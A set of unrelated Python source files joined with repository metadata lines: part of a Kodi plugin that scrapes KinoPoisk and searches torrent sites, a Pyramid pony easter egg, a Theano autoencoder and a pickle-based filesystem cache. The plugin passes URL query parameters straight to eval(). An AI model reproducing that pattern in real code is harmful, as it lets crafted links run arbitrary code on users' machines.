Cat=getList2("CatList")
sCat=""
for i in Cat:
sCat=sCat+"m_act%5B"+str(CategoryDict[i])+"%5D/on/"
if sCat == "m_act%5B%5D/on/" or sCat == "m_act%5Ball%5D/on/": sCat =""
Cantry=getList2("CantryList")
Cantrys=""
for i in Cantry:
Cantrys=Cantrys+","+str(CantryDict[i])
Cantrys=Cantrys[1:]
if Cantrys == "" or Cantrys == "0": sCantry =""
else: sCantry = "m_act%5Bcountry%5D/"+ Cantrys+"/"
Genre=getList2("GenreList")
Genres=""
for i in Genre:
Genres=Genres+","+str(GenreDict[i])
Genres=Genres[1:]
if Genres == "" or Genres == "0": sGenre =""
else: sGenre = "m_act%5Bgenre%5D/"+ Genres+"/"
try:YearId = YearDict[Years]
except:YearId="0"
if YearId == "0": sYear = ""
else: sYear = "m_act%5Bdecade%5D/"+ YearId+"/"
try:OldId = OldDict[Old]
except:OldId=""
if OldId == "": sOld = ""
else: sOld = "m_act%5Brestriction%5D/"+ OldId+"/"
try:RatingId = RatingDict[Rating]
except:RatingId=""
if RatingId == "": sRating = ""
else: sRating = "m_act%5Brating%5D/"+ RatingId+":/"
try:sSort = SortDict[Sort]
except:sSort = "order/rating"
if sCat.find("is_serial%5D/on")<0 and sCat!="": sGenre=sGenre+"m_act%5Begenre%5D/999/"
print sCat
print sGenre
link=httpSiteUrl+"/top/navigator/"+sGenre+sCantry+sYear+sRating+sOld+sCat+sSort+"/perpage/100/#results"
if link=="http://www.KinoPoisk.ru/top/navigator/order/rating/perpage/100/#results":
link="http://www.KinoPoisk.ru/top/navigator/m_act%5Brating%5D/7:/order/rating/perpage/100/#results"
elif md=="Popular": link="http://www.kinopoisk.ru/top/lists/186/filtr/all/sort/order/perpage/200/"
elif md=="New": link="http://www.kinopoisk.ru/top/lists/222/"
elif md=="Future":
#link="http://www.kinopoisk.ru/top/lists/220/"
link="http://www.kinopoisk.ru/comingsoon/sex/all/sort/date/period/halfyear/"
ss='id="top_film_'
se='" class="item" style="z'
elif md=="Recomend":
try:id = urllib.unquote_plus(get_params()["id"])
except: id = ''
link="http://www.kinopoisk.ru/film/"+id+"/like/"
#print link
elif md=="PersonFilm":
id = params["info"]["id"]
#try:id = eval(urllib.unquote_plus(get_params()["info"]))["id"]
#except: id = ''
link="http://m.kinopoisk.ru/person/"+id+"/"
ss="m.kinopoisk.ru/movie/"
se='/">'
#print link
else:
link='http://www.kinopoisk.ru/index.php?first=no&what=&kp_query='+formatKP(md)
ss="/level/1/film/"
se='/sr/1/">'
http = GET (link, httpSiteUrl)
#debug (http)
#ss="/level/1/film/"
#ss='id="film_eye_'
#se='/">'
#se='"></div>'
L=mfindal(http, ss, se)
#debug (str(L))
L2=[]
for i in L:
if i not in L2 and i<>"": L2.append(i)
#debug (str(L2))
for i in L2[:-1]:#
FilmID=i[len(ss):]
#info=eval(xt(get_inf_db(FilmID)))
try:
info=eval(xt(get_inf_db(FilmID)))
nru=info["title"]
rating_kp=info["rating"]
if rating_kp>0: rkp=str(rating_kp)[:3]
else: rkp= " - - "
info["id"] = FilmID
#AddItem("[ "+rkp+" ] "+nru, "Torrents", info, len(L2)-2)
#print " OK: "+nru
except:
# if len(i)>10:
url="http://m.kinopoisk.ru/movie/"+i[len(ss):]
http = GET (url, httpSiteUrl)
#debug (http)
# ------------- ищем описание -----------------
s='<div id="content">'
e='<br><div class="city">'
try: Info=mfindal(http, s, e)[0]
except: Info=""
#debug (Info)
# ------------- название -----------------
s='<p class="title">'
e='<img src="http://m.kinopoisk.ru/images/star'
if Info.find(e)<0: e='<div class="block film">'
try:
nbl=mfindal(Info, s, e)[0][len(s):]
except:
nbl=""
if nbl <> "":
# ---------------- ru -------------------
s='<b>'
e='</b>'
nru=mfindal(nbl, s, e)[0][len(s):]
# ---------------- en yar time -------------------
s='<span>'
e='</span>'
nen=mfindal(nbl, s, e)[0][len(s):]
vrn=nen.replace("'","#^").replace(",", "','")
tmps="['"+vrn+"']"
Lt=eval(tmps)
n=len(Lt)
year=0
duration=""
for i in Lt:
try: year=int(i)
except: pass
if i[-1:]==".": duration=i
if year>0: n2= nen.find(str(year))
else: n2=-1
if duration<>"":n3=nen.find(duration)
else: n3=-1
if n3>0 and n3<n2: n2=n3
if n2>1: nen=nen[:n2-2]
else: nen=nru
# ---------------- жанр страна ----------
s='<div class="block film">'
e='<span class="clear"'
try:
b2=mfindal(Info, s, e)[0][len(s):]
s='<span>'
e='</span>'
genre=mfindal(b2, s, e)[0][len(s):]
studio=mfindal(b2, s, e)[1][len(s):]
except:
genre=""
studio=""
# ---------------- режисер ----------
s='<span class="clear">'
e='</a></span>'
try:
directors=mfindal(Info, s, e)[0][len(s):]
s='/">'
e='</a>'
try:
director1=mfindal(directors, s, e)[0][len(s):]
nn=directors.rfind('/">')
director=director1+", "+directors[nn+3:]
except:
nn=directors.rfind('/">')
director=directors[nn+3:]
except:
director=""
# --------------- актеры ------------
if director!="":
s=directors#'<span class="clear">'
e='<p class="descr">'
if Info.find(e)<0:e='">...</a>'
try:bcast=mfindal(Info, s, e)[0][len(s):]
except: bcast=""
s='/">'
e='</a>,'
lcast=mfindal(bcast, s, e)
cast=[]
for i in lcast:
cast.append(fs(i[3:]))
else:
cast=[]
# ---------------- описание ----------
s='<p class="descr">'
e='<span class="link">'
if Info.find(e)<0: e='<p class="margin"'
#debug (Info)
try:plotand=mfindal(Info, s, e)[0][len(s):]
except:plotand=""# ----------------------------------------------------------- доделать ----------
nn=plotand.find("</p>")
plot=plotand[:nn].replace("<br>","").replace("<br />","")
# ----------------- оценки ------------
tale=plotand[nn:]
s='</b> <i>'
e='</i> ('
ratings=mfindal(Info, s, e)
try:rating_kp=float(ratings[0][len(s):])
except:rating_kp=0
try:rating_IMDB=float(ratings[1][len(s):])
except: rating_IMDB=0
# ------------------ обложка ----------
s='http://st.kp.yandex.net/images/sm_'
e='.jpg" width="'
try:cover=mfindal(Info, s, e)[0].replace('sm_film/','film_iphone/iphone360_')+'.jpg'
except:cover="http://st.kp.yandex.net/images/image_none_no_border.gif"
# ------------------ фанарт ----------
s='http://st.kp.yandex.net/images/kadr'
e='.jpg"/></div>'
try:fanart=mfindal(Info, s, e)[0].replace('sm_','')+'.jpg'
except:fanart=""
info = {"title":fs(nru),
"originaltitle":fs(nen),
"year":year,
"duration":duration[:-5],
"genre":fs(genre),
"studio":fs(studio),
"director":fs(director),
"cast":cast,
"rating":rating_kp,
"cover":cover,
"fanart":fanart,
"plot":fs(plot)
}
info["id"] = FilmID
if rating_kp>0: rkp=str(rating_kp)[:3]
else: rkp= " - - "
nru=fs(nru)
#AddItem("[ "+rkp+" ] "+fs(nru), "Torrents", info, len(L2)-2)
try:
if rating_kp>0: add_to_db(FilmID, repr(info))
#print "ADD: " + FilmID
except:
print "ERR: " + FilmID
#print repr(info)
try: AddItem("[ "+rkp+" ] "+ nru, "Torrents", info, len(L2)-2)
except: pass
#============== Menu ====================
def Root():
AddItem("Поиск", "Search")
AddItem("Навигатор", "Navigator")
AddItem("Популярные", "Popular")
AddItem("Недавние премьеры", "New")
AddItem("Самые ожидаемые", "Future")
AddItem("Персоны", "PersonList")
def Search():
SrcNavi(inputbox())
def PersonSearch():
PS=inputbox()
link='http://www.kinopoisk.ru/index.php?first=no&what=&kp_query='+formatKP(PS)
http = GET (link, httpSiteUrl)
ss='http://st.kp.yandex.net/images/sm_actor/'
es='" title="'
l1=mfindal(http,ss,es)
for i in l1:
if len(i) > 45 and len(i)< 550:
n=i.find('.jpg" alt="')
id=i[len(ss):n]
nm=i[n+11:]
cover='http://st.kp.yandex.net/images/actor_iphone/iphone360_'+id+".jpg"
info={"cover":cover, "title":nm, "id":id}
if len(nm)>0 and len(id)>0 :AddItem(fs(nm), "PersonFilm", info, len(l1))
#debug (http)
def getList(id):
try:L = eval(__settings__.getSetting(id))
except:L =[]
S=""
for i in L:
if i[:1]=="[": S=S+", "+i
return S[1:]
def getList2(id):
try:L = eval(__settings__.getSetting(id))
except:L =[]
S=[]
for i in L:
if i[:1]=="[": S.append(i.replace("[COLOR FFFFFF00]","").replace("[/COLOR]",""))
return S
def setList(idw, L):
__settings__.setSetting(id=idw, value=repr(L))
def Navigator():
Cats=getList("CatList")
Genres=getList("GenreList")
Cantrys=getList("CantryList")
Years=__settings__.getSetting("YearList")
Old=__settings__.getSetting("OldList")
Sort=__settings__.getSetting("SortList")
Rating=__settings__.getSetting("RatingList")
if Cats=="": Cats="[COLOR FFFFFF00] --[/COLOR]"
if Genres=="": Genres="[COLOR FFFFFF00] --[/COLOR]"
if Cantrys=="": Cantrys="[COLOR FFFFFF00] --[/COLOR]"
if Years=="": Years="--"
if Old=="": Old="--"
if Rating=="": Rating="> 7"
if Sort=="": Sort="рейтингу Кинопоиска"
AddItem("Категории: " +Cats, "SelCat")
AddItem("Жанры: " +Genres, "SelGenre")
AddItem("Страны: " +Cantrys, "SelCantry")
AddItem("Год: [COLOR FFFFFF00]" +Years+"[/COLOR]", "SelYear")
AddItem("Возраст: [COLOR FFFFFF00]" +Old+"[/COLOR]", "SelOld")
AddItem("Рейтинг: [COLOR FFFFFF00]" +Rating+"[/COLOR]", "SelRating")
AddItem("Порядок: [COLOR FFFFFF00]по " +Sort+"[/COLOR]", "SelSort")
AddItem("[B][COLOR FF00FF00][ Искать ][/COLOR][/B]", "SrcNavi")
def Popular():
AddItem("Популярные", "Popular")
def New():
AddItem("Недавние премьеры", "New")
def Future():
AddItem("Самые ожидаемые", "Future")
Category=[]
CategoryDict={}
for i in TypeList:
Category.append(i[1])
CategoryDict[i[1]]=i[0]
Genre=[]
GenreDict={}
for i in GenreList:
Genre.append(i[1])
GenreDict[i[1]]=i[0]
Cantry=[]
CantryDict={}
for i in CantryList:
Cantry.append(i[1])
CantryDict[i[1]]=i[0]
Year=[]
YearDict={}
for i in YearList:
Year.append(i[1])
YearDict[i[1]]=i[0]
Old=[]
OldDict={}
for i in OldList:
Old.append(i[1])
OldDict[i[1]]=i[0]
Sort=[]
SortDict={}
for i in SortList:
Sort.append(i[1])
SortDict[i[1]]=i[0]
Rating=[]
RatingDict={}
for i in RatingList:
Rating.append(i[1])
RatingDict[i[1]]=i[0]
try: url = eval(urllib.unquote_plus(get_params()["url"]))
except: url = ""
try: info = eval(urllib.unquote_plus(get_params()["info"]))
except: info = {}
try: params = eval(urllib.unquote_plus(get_params()["params"]))
except: params = {}
try: mode = urllib.unquote_plus(get_params()["mode"])
except:
try:mode = params["mode"]
except:mode = None
if mode == None:
setList("CatList", Category)
setList("GenreList", Genre)
setList("CantryList", Cantry)
__settings__.setSetting(id="YearList", value="")
__settings__.setSetting(id="OldList", value="")
__settings__.setSetting(id="SortList", value="")
__settings__.setSetting(id="RatingList", value="")
Root()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Search":
Search()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Navigator":
Navigator()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Popular":
SrcNavi("Popular")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "New":
SrcNavi("New")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Future":
SrcNavi("Future")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Recomend":
#xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
#xbmcplugin.endOfDirectory(handle)
#xbmc.sleep(1000)
SrcNavi("Recomend")
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "PersonFilm":
SrcNavi("PersonFilm")#+PeID
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "Person":
Person()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "PersonList":
AddItem("[ Поиск ]", "PersonSearch")
PersonList()
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode=="PersonSearch":
PersonSearch()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode=="AddPerson":
AddPerson(info)
if mode=="RemovePerson":
RemovePerson(info)
xbmc.executebuiltin("Container.Refresh()")
if mode == "SrcNavi":
SrcNavi()
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
if mode == "SelCat":
SelectBox.run("CatList")
if mode == "SelGenre":
SelectBox.run("GenreList")
if mode == "SelCantry":
SelectBox.run("CantryList")
if mode == "SelYear":
sel = xbmcgui.Dialog()
r = sel.select("Десятилетие:", Year)
__settings__.setSetting(id="YearList", value=Year[r])
if mode == "SelOld":
sel = xbmcgui.Dialog()
r = sel.select("Возраст:", Old)
__settings__.setSetting(id="OldList", value=Old[r])
if mode == "SelSort":
sel = xbmcgui.Dialog()
r = sel.select("Десятилетие:", Sort)
__settings__.setSetting(id="SortList", value=Sort[r])
if mode == "SelRating":
sel = xbmcgui.Dialog()
r = sel.select("Десятилетие:", Rating)
__settings__.setSetting(id="RatingList", value=Rating[r])
if mode == "Torrents":
gty=sys.argv[0] + '?mode=Torrents2¶ms='+ urllib.quote_plus(repr(params))
xbmc.executebuiltin("Container.Update("+gty+", "+gty+")")
if mode == "Torrents2":
info=params["info"]
id=params["info"]["id"]
try:rus=params["info"]["title"].encode('utf8')
except: rus=params["info"]["title"]
try:en=params["info"]["originaltitle"].encode('utf8')
except: en=params["info"]["originaltitle"]
if rus == en:text = rus.replace("a","а")+" "+str(params["info"]["year"])
else:text = params["info"]["originaltitle"]+" "+str(params["info"]["year"])+" "+rus.replace("a","а")
n=text.find("(")
#if n>0: text = text[:n-1]
#ttl=s2kp(id, info)
ttl=rutor(text, info)
if ttl<15:
ttl=stft(text, info)
if ttl<10:
n=en.find("(")
if n>0: text = en[:n-1]
else: text = en
ttl=stft(text, info)
if ttl<10:
n=rus.find("(")
if n>0: text = rus.replace("a","а")[:n-1]
else: text = rus.replace("a","а")
ttl=stft(text, info)
xbmcplugin.setPluginCategory(handle, PLUGIN_NAME)
xbmcplugin.endOfDirectory(handle)
xbmc.sleep(300)
xbmc.executebuiltin("Container.SetViewMode(51)")
if mode == "OpenTorrent":
url = urllib.unquote_plus(get_params()["url"])
try:img=info["cover"]
except: img=icon
engine = __settings__.getSetting("Engine")
#print "engine = "+str(engine)
if engine==0 or engine=='0':
play_url(url,img)
else:
DownloadDirectory = __settings__.getSetting("DownloadDirectory")[:-1]#.replace("\\\\","\\")
if DownloadDirectory=="":DownloadDirectory=LstDir
playTorrent(url, DownloadDirectory)
elif mode == 'play_url2':
play_url2(get_params())
c.close() | sshnaidm/ru | plugin.video.KinoPoisk.ru/default.py | Python | gpl-2.0 | 38,625 |
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# Modified by Mike Orr for Akhet.
"""
We have a pony and a unicorn.
"""
import base64
import zlib
from pyramid.response import Response
def includeme(config):
"""Add pony power to any Pyramid application.
Defines the "pony" route at URL "/pony".
"""
config.add_route("pony", "/pony")
config.add_view(view, route_name="pony")
PONY = """
eJyFkkFuxCAMRfdzCisbJxK2D5D2JpbMrlI3XXQZDt9PCG0ySgcWIMT79rcN0XClUJlZRB9jVmci
FmV19khjgRFl0RzrKmqzvY8lRUWFlXvCrD7UbAQR/17NUvGhypAF9og16vWtkC8DzUayS6pN3/dR
ki0OnpzKjUBFpmlC7zVFRNL1rwoq6PWXXQSnIm9WoTzlM2//ke21o5g/l1ckRhiPbkDZXsKIR7l1
36hF9uMhnRiVjI8UgYjlsIKCrXXpcA9iX5y7zMmtG0fUpW61Ssttipf6cp3WARfkMVoYFryi2a+w
o/2dhW0OXfcMTnmh53oR9egzPs+qkpY9IKxdUVRP5wHO7UDAuI6moA2N+/z4vtc2k8B+AIBimVU=
"""
UNICORN = """
eJyVVD1vhDAM3e9XeAtIxB5P6qlDx0OMXVBzSpZOHdsxP762E0JAnMgZ8Zn37OePAPC60eV1Dl5b
SS7fB6DmQNGhtegpNlPIQS8HmkYGdSqNqDF9wcMYus4TuBYGsZwIPqXfEoNir5K+R3mbzhlR4JMW
eGpikPpn9wHl2sDgEH1270guZwzKDRf3nTztMvfI5r3fJqEmNxdCyISBcWjNgjPG8Egg2hgT3mJi
KBwNvmPB1hbWJ3TwBfMlqdTzxNyDE2H8zOD5HA4KkqJGPVY/TwnxmPA82kdSJNj7zs+R0d1pB+JO
xn2DKgsdxAfFS2pfTSD0Fb6Uzv7dCQSvE5JmZQEQ90vNjBU1GPuGQpCPS8cGo+dQgjIKqxnJTXbw
ucFzPFVIJXtzk6BXKGPnYsKzvFmGx7A0j6Zqvlvk5rETXbMWTGWj0RFc8QNPYVfhJfMMniCPazWJ
lGtPZecIGJWW6oL2hpbWRZEkChe8eg5Wb7xx/MBZBFjxeZPEss+mRQ3Uhc8WQv684seSRO7i3nb4
7HlKUg8sraz47LmXyh8S0somADvoUpoHjGWl+rUkF0H+EIf/gbyyMg58BBk6L634/fkHUCodMw==
"""
TEMPLATE = """\
<!DOCTYPE html>
<html><head><title>Pony</title></head><body>
<pre>{animal}</pre>
<p><a href="{url}">{link}</a></p>
<p><a href="{home}">Home</a></p>
</body></html>
"""
def view(request):
"""A pony view.
Display a pony.
If query param 'horn' is non-empty, display a unicorn instead.
"""
req = request
home = req.script_name or "/"
url = req.path
if request.params.get("horn"):
data = UNICORN
link = "remove horn!"
url = req.path
else:
data = PONY
link = "add horn!"
url = req.path + "?horn=1"
#animal = data.decode("base64").decode("zlib")
data = base64.b64decode(data)
animal = zlib.decompress(data).decode('ascii')
html = TEMPLATE.format(animal=animal, url=url, link=link, home=home)
return Response(html)
| knzm/pyramid_pony | pyramid_pony/pony.py | Python | mit | 2,385 |
import theano
import numpy as np
import theano.tensor as T
from random import sample
sigmoid = lambda x: 1 / (1 + T.exp(-x))
class DAE(object):
"""Defines a multi autoencoder.
layer_types can be either 'logistic' or 'linear' at the moment.
"""
def __init__(self, input_dim, layer_sizes, layer_types, sparse=False):
self.input_dim = input_dim
self.layer_sizes = layer_sizes
self.layer_types = layer_types
self.weights = []
self.biases = []
self.weights.append(theano.shared(np.asarray(np.random.normal(0, 1, (input_dim, layer_sizes[0])), dtype='float32')))
for i, j in zip(layer_sizes[:-1], layer_sizes[1:]):
w = np.asarray(np.random.normal(0, 1, (i, j)), dtype='float32')
self.weights.append(theano.shared(w))
self.weights.append(theano.shared(np.asarray(np.random.normal(0, 1, (layer_sizes[-1], input_dim)), dtype='float32')))
if sparse:
for w in self.weights:
w_ = w.get_value()
m, n = w_.shape
if m >= 15:
mask = np.zeros_like(w_)
for i in range(n):
indices = sample(range(m), 15)
mask[indices, i] = 1.0
w.set_value(w_ * mask)
self.biases = [theano.shared(np.zeros(i, dtype='float32')) for i in layer_sizes]
self.biases.append(theano.shared(np.zeros(input_dim, dtype='float32')))
self.parameters = self.weights + self.biases
def t_forward(self, x, return_linear=False):
a = x
for w, b, function in zip(self.weights, self.biases, self.layer_types):
s = T.dot(a, w) + T.shape_padleft(b, 1)
if function == 'logistic':
a = sigmoid(s)
else:
a = s
if return_linear:
return a, s
return a
def t_ce(self, x, t):
y = self.t_forward(x)
return T.nnet.binary_crossentropy(y, t).mean()
def t_stable_ce(self, s, t):
# FIXME: I get nans if I use the mean
return -(t * (s - T.log(1 + T.exp(s))) + (1 - t) *
(-s - T.log(1 + T.exp(-s))))
| pbrakel/ksd-theano | autoencoder.py | Python | mit | 2,216 |
#! /usr/bin/env python
import os
import hashlib
import cPickle
import time
import base64
import inspect
__all__ = ["CacheError", "FSCache", "make_digest",
"auto_cache_function", "cache_function", "to_seconds"]
class CacheError(Exception):
pass
class TimeError(CacheError):
pass
class LifetimeError(CacheError):
pass
class CacheObject(object):
"""
A wrapper for values, to allow for more elaborate control
like expirations some time in the far, far, distant future,
if ever. So don't count on it unless someone writes a patch.
"""
def __init__(self, value, expiration=None):
"""
Creates a new :class:`phyles.CacheObject` with an attribute
``value`` that is object passed by the `value` parameter. The
`expiration` should be the number of seconds since the epoch.
See the python :py:mod:`time` module for a discussion of the
epoch. If `expiration` is excluded, the the :class:`CacheObject`
object has no expiration.
"""
self._value = value
self._expiration = expiration
def get_value(self):
return self._value
def get_expiration(self):
return self._expiration
def expired(self):
"""
Returns ``True`` if the :class:`CacheObject` object has
expired according to the system time.
If the :class:`CacheObject` has an expiration of ``None``,
then ``False`` is returned.
"""
if self.expiration is None:
r = False
else:
r = (self.expiration < time.time())
return r
value = property(get_value)
expiration = property(get_expiration)
class FSCache(object):
"""
A class that manages a filesystem cache. Works like
a dictionary and can decorate functions to make them
cached.
A :class:`pyfscache.FSCache` object is instantiated
with a `path` and optional lifetime keyword arguments:
.. code-block:: python
>>> c = FSCache('cache/dir', days=7)
This command creates a new FSCache instance at the given
`path` (``cache/dir``). Each item added by this cache
has a lifetime of 7 days, starting when the item (not the cache)
is created. If the `path` doesn't exist,
one is made. New items added to the cache are given a lifetime
expressed by the keyword arguments with potential keys of
``years``, ``months``, ``weeks``, ``days``,
``hours``, ``minutes``, ``seconds`` (see :func:`to_seconds`).
If no keyword arguments are given, then the
items added by the cache do not expire automatically.
Creating an :class:`pyfscache.FSCache` object does not purge
the cache in `path` if the cache already exists. Instead,
the :class:`pyfscache.FSCache` object will begin to use the
cache, loading items and storing items as necessary.
.. code-block:: python
>>> import os
>>> import shutil
>>> from pyfscache import *
>>> if os.path.exists('cache/dir'):
... shutil.rmtree('cache/dir')
...
>>> c = FSCache('cache/dir', days=7)
>>> c['some_key'] = "some_value"
>>> c['some_key']
'some_value'
>>> os.listdir('cache/dir')
['PXBZzwEy3XnbOweuMtoPj9j=PwkfAsTXexmW2v05JD']
>>> c.expire('some_key')
>>> os.listdir('cache/dir')
[]
>>> c['some_key'] = "some_value"
>>> @c
... def doit(avalue):
... print "had to call me!"
... return "some other value"
...
>>> doit('some input')
had to call me!
'some other value'
>>> doit('some input')
'some other value'
>>> shutil.rmtree('cache/dir')
"""
def __init__(self, path, **kwargs):
"""
A :class:`pyfscache.FSCache` object is instantiated
with a `path` and optional lifetime keyword arguments:
.. code-block:: python
>>> c = FSCache('cache/dir', days=7)
Inits a new FSCache instance at the given `path`.
If the `path` doesn't exist, one is made. New objects
added to the cache are given a lifetime, expressed in the
keyword arguments `kwargs` with potential keys of
``years``, ``months``, ``weeks``, ``days``,
``hours``, ``minutes``, ``seconds``. See :func:`to_seconds`.
If no keyword arguments are given, then the lifetime
is considered to be infinite.
Creating a :class:`pyfscache.FSCache` object does not purge
the cache in `path` if the cache already exists. Instead,
the :class:`pyfscache.FSCache` object will begin to use the
cache, loading items and storing items as necessary.
"""
if kwargs:
self._lifetime = to_seconds(**kwargs)
if self._lifetime <= 0:
msg = "Lifetime (%s seconds) is 0 or less." % self._lifetime
raise LifetimeError, msg
else:
self._lifetime = None
self._loaded = {}
self._path = os.path.abspath(path)
if not os.path.exists(self._path):
os.makedirs(self._path)
def __getitem__(self, k):
"""
Returns the object stored for the key `k`. Will
load from the filesystem if not already loaded.
"""
if k in self:
digest = make_digest(k)
value = self._loaded[digest].value
else:
msg = "No such key in cache: '%s'" % k
raise KeyError(msg)
return value
def __setitem__(self, k, v):
"""
Sets the object `v` to the key `k` and saves the
object in the filesystem. This will raise an error
if an attempt is made to set an object for a key `k`
that already exists. To replace an item forcibly in this
way, use :func:`update`, or first use :func`expire`.
"""
digest = make_digest(k)
path = os.path.join(self._path, digest)
if (digest in self._loaded) or os.path.exists(path):
tmplt = ("Object for key `%s` exists\n." +
"Remove the old one before setting the new object.")
msg = tmplt % str(k)
raise CacheError, msg
else:
expiry = self.expiry()
contents = CacheObject(v, expiration=expiry)
dump(contents, path)
self._loaded[digest] = contents
def __delitem__(self, k):
"""
Removes the object keyed by `k` from memory
but not from the filesystem. To remove it from both the memory,
and the filesystem, use `expire`.
Synonymous with :func:`FSCache.unload`.
"""
digest = make_digest(k)
if digest in self._loaded:
del(self._loaded[digest])
else:
msg = "Object for key `%s` has not been loaded" % str(k)
raise CacheError, msg
def __contains__(self, k):
"""
Returns ``True`` if an object keyed by `k` is
in the cache on the file system, ``False`` otherwise.
"""
digest = make_digest(k)
if digest in self._loaded:
contents = self._loaded[digest]
isin = True
else:
try:
contents = self._load(digest, k)
isin = True
except CacheError:
isin = False
if isin:
if contents.expired():
self.expire(k)
isin = False
return isin
def __call__(self, f):
"""
Returns a cached function from function `f` using `self`
as the cache. See :func:`auto_cache_function`.
Imbues an :class:`FSCache` object with the ability to
be a caching decorator.
>>> acache = FSCache('cache-dir')
>>> @acache
... def cached_by_decorator(a, b, c):
... return list(a, b, c)
...
>>> cached_by_decorator(1, 2, 3)
[1, 2, 3]
>>> cached_by_decorator(1, 2, 3)
[1, 2, 3]
"""
return auto_cache_function(f, self)
def _load(self, digest, k):
"""
Loads the :class:`CacheObject` keyed by `k` from the
file system (residing in a file named by `digest`)
and returns the object.
This method is part of the implementation of :class:`FSCache`,
so don't use it as part of the API.
"""
path = os.path.join(self._path, digest)
if os.path.exists(path):
contents = load(path)
else:
msg = "Object for key `%s` does not exist." % (k,)
raise CacheError, msg
self._loaded[digest] = contents
return contents
def _remove(self, k):
"""
Removes the cache item keyed by `k` from the file system.
This method is part of the implementation of :class:`FSCache`,
so don't use it as part of the API.
"""
digest = make_digest(k)
path = os.path.join(self._path, digest)
if os.path.exists(path):
os.remove(path)
else:
msg = "No object for key `%s` stored." % str(k)
raise CacheError, msg
def is_loaded(self, k):
"""
Returns ``True`` if the item keyed by `k` has been loaded,
``False`` if not.
"""
digest = make_digest(k)
return digest in self._loaded
def unload(self, k):
"""
Removes the object keyed by `k` from memory
but not from the filesystem. To remove the object
keyed by `k` from both memory and permanently from the
filesystem, use `expire`.
Synonymous with deleting an item.
"""
del self[k]
def expire(self, k):
"""
Use with care. This permanently removes the object keyed
by `k` from the cache, both in the memory and in the filesystem.
"""
self._remove(k)
del self[k]
def get_path(self):
"""
Returns the absolute path to the file system cache represented
by the instance.
"""
return self._path
def get_lifetime(self):
"""
Returns the lifetime, in seconds, of new items in the cache.
If new items do not expire, then ``None`` is returned.
"""
return self._lifetime
def update_item(self, k, v):
"""
Use with care. Updates, both in memory and on the filesystem,
the object for key `k` with the object `v`. If the key `k`
already exists with a stored object, it will be replaced.
"""
self.expire(k)
self[k] = v
def load(self, k):
"""
Causes the object keyed by `k` to be loaded from the
file system and returned. It therefore causes this object
to reside in memory.
"""
return self[k]
def unload(self, k):
"""
Removes the object keyed by `k` from memory
but not from the filesystem. To remove it from both
memory and permanently from the filesystem, use `expire`.
"""
digest = make_digest(k)
if digest in self._loaded:
del(self._loaded[digest])
def get_loaded(self):
"""
Returns a list of keys for all objects that are loaded.
"""
return self._loaded.keys()
def get_names(self):
"""
Returns the names of the files in the cache on the
filesystem. These are not keys but one-way hashes
(or "digests") of the keys created by :func:`make_digest`.
"""
return os.listdir(self._path)
def clear(self):
"""
Unloads all loaded cache items from memory.
All cache items remain on the disk, however.
"""
self._loaded.clear()
def purge(self):
"""
Be careful, this empties the cache from both the filesystem
and memory!
"""
files = os.listdir(self._path)
for f in files:
path = os.path.join(self._path, f)
os.remove(path)
self.clear()
def expiry(self):
"""
Returns an expiry for the cache in seconds as if the start
of the expiration period were the moment at which this
the method is called.
>>> import time
>>> c = FSCache('cache/dir', seconds=60)
>>> round(c.expiry() - time.time(), 3)
60.0
"""
if self.lifetime is None:
x = None
else:
x = self.lifetime + time.time()
return x
path = property(get_path)
lifetime = property(get_lifetime)
def make_digest(k):
"""
Creates a digest suitable for use within an :class:`phyles.FSCache`
object from the key object `k`.
>>> adict = {'a' : {'b':1}, 'f': []}
>>> make_digest(adict)
'a2VKynHgDrUIm17r6BQ5QcA5XVmqpNBmiKbZ9kTu0A'
"""
s = cPickle.dumps(k)
h = hashlib.sha256(s).digest()
b64 = base64.urlsafe_b64encode(h)[:-2]
return b64.replace('-', '=')
def load(filename):
"""
Helper function that simply pickle loads the first object
from the file named by `filename`.
"""
f = open(filename, 'rb')
obj = cPickle.load(f)
f.close()
return obj
def dump(obj, filename):
"""
Helper function that simply pickle dumps the object
into the file named by `filename`.
"""
f = open(filename, 'wb')
cPickle.dump(obj, f, cPickle.HIGHEST_PROTOCOL)
f.close()
def auto_cache_function(f, cache):
"""
Creates a cached function from function `f`.
The `cache` can be any mapping object, such as `FSCache` objects.
The function arguments are expected to be well-behaved
for python's :py:mod:`cPickle`. Or, in other words,
the expected values for the parameters (the arguments) should
be instances new-style classes (i.e. inheriting from
:class:`object`) or implement :func:`__getstate__` with
well-behaved results.
If the arguments to `f` are not expected to be well-behaved,
it is best to use `cache_function` instead and create a custom keyer.
"""
m = inspect.getmembers(f)
try:
fid = (f.func_name, inspect.getargspec(f))
except (AttributeError, TypeError):
fid = (f.__name__, repr(type(f)))
def _f(*args, **kwargs):
k = (fid, args, kwargs)
if k in cache:
result = cache[k]
else:
result = f(*args, **kwargs)
cache[k] = result
return result
return _f
def cache_function(f, keyer, cache):
"""
Takes any function `f` and a function that creates a key,
`keyer` and caches the result in `cache`.
The keys created by `keyer` should be well behaved for
python's :py:mod:`cPickle`. See the documentation for
:func:`auto_cache_funtion` for details.
It is best to have a unique `keyer` for every function.
"""
